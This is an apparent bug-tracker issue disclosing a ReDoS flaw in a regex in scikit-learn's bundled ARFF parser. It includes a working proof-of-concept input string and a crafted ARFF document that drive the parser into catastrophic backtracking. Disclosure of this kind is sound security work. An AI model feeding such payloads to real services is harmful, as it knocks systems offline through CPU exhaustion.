Closed
Description
Problem description
i found one bad regex pattern in 'sklearn/externals/_arff.py'
_RE_TYPE_NOMINAL = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$', re.UNICODE)
that pattern will cause 'ReDos' security problem, proof of code like below
import re
p = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$')
re.findall(p, "{"+"',"*100)
run the above code, cpu utilization will be 100% in a very long period.
more detail about 'ReDos' please see owasp.
effect of this security problem
some api will call the pattern,like below
from sklearn.externals._arff import ArffDecoder
content = """
@relation foo
@attribute width {',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',
@attribute height {',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',
@attribute color {red,green,blue,yellow,black}
@data
5.0,3.25,blue
4.5,3.75,green
3.0,4.00,red
"""
ArffDecoder().decode(s=content)